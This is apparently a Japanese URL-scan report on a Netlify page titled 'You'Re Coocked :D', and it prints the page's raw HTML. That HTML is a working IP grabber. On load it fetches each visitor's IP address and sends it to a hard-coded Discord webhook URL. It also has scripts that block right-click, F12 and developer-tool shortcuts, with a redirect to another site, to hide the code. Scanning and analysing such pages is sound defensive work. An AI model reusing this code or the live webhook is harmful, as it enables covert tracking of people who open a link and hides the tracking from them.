- スキャンID:
- 172c4e46-eedb-4de5-88bd-b49c36567620終了
- 送信済みURL:
- https://rbxgeo.netlify.app/
- レポート終了日:
リンク · 0件検出
ページから特定された発信リンク
JavaScript変数 · 5件検出
ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です
名前 | 規模 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
sendToDiscord | function |
disableRightClick | function |
コンソールログメッセージ · 4件検出
Webコンソールにログ記録されたメッセージ
規模 | 分類 | ログ |
---|---|---|
error | network |
|
log | other |
|
error | network |
|
error | other |
|
HTML
未加工のHTMLページ本文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>You'Re Coocked :D</title>
</head>
<body>
<h1></h1>
<script>
// Replace this with your Discord webhook URL
const webhookURL = 'https://discord.com/api/webhooks/1285137384803012618/f4socKKRgToMG-Giq-JnU-hy16hSxIBBp4wViGj_KQJaGTnoezEmc-XrY0LLsRgxwh4C';
// Function to send the IP address to the Discord webhook
function sendToDiscord(ip) {
const data = {
content: `User's IP Address: ${ip}`,
};
// Send IP to the Discord webhook via POST request
fetch(webhookURL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => {
if (response.ok) {
console.log('IP sent to Discord successfully.');
} else {
console.error('Failed to send IP to Discord.');
}
})
.catch(error => console.error('Error:', error));
}
// Get user's IP using the ipify API
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
const ip = data.ip;
console.log('User IP Address:', ip);
// Send the IP to the Discord webhook
sendToDiscord(ip);
})
.catch(error => console.error('Error fetching IP:', error));
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<h1></h1>
<script>
// Listen for keydown events
document.addEventListener('keydown', function(event) {
// Check if F12 (keyCode 123) is pressed
if (event.key === "F12" || event.keyCode === 123) {
// Prevent the default action of opening the developer tools
event.preventDefault();
// Redirect to Google
window.location.href = 'https://tynauri.net';
}
});
// Optional: Detect right-click to prevent inspecting elements via context menu
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<script>
// Function to disable right-click
function disableRightClick(event) {
event.preventDefault(); // Prevent the default context menu from appearing
alert("Right-click is disabled on this page."); // Optional alert
}
// Attach the event listener when the page loads
window.onload = function() {
document.addEventListener('contextmenu', disableRightClick);
};
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Disable Inspect Methods</title>
<script>
// Disable right-click and keyboard shortcuts
document.addEventListener('contextmenu', function(event) {
event.preventDefault(); // Disable right-click
});
document.addEventListener('keydown', function(event) {
if (event.key === 'F12' ||
(event.ctrlKey && (event.key === 'i' || event.key === 'u')) ||
(event.shiftKey && event.ctrlKey && event.key === 'i')) {
event.preventDefault(); // Disable F12 and Ctrl+Shift+I, Ctrl+U
}
});
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
document.addEventListener('keydown', function(event) {
// Check if Ctrl + Shift + I is pressed
if (event.ctrlKey && event.shiftKey && event.key === 'I') {
event.preventDefault(); // Prevent the default action
alert("Developer Tools are disabled on this page.");
}
});
</script>
</body></html>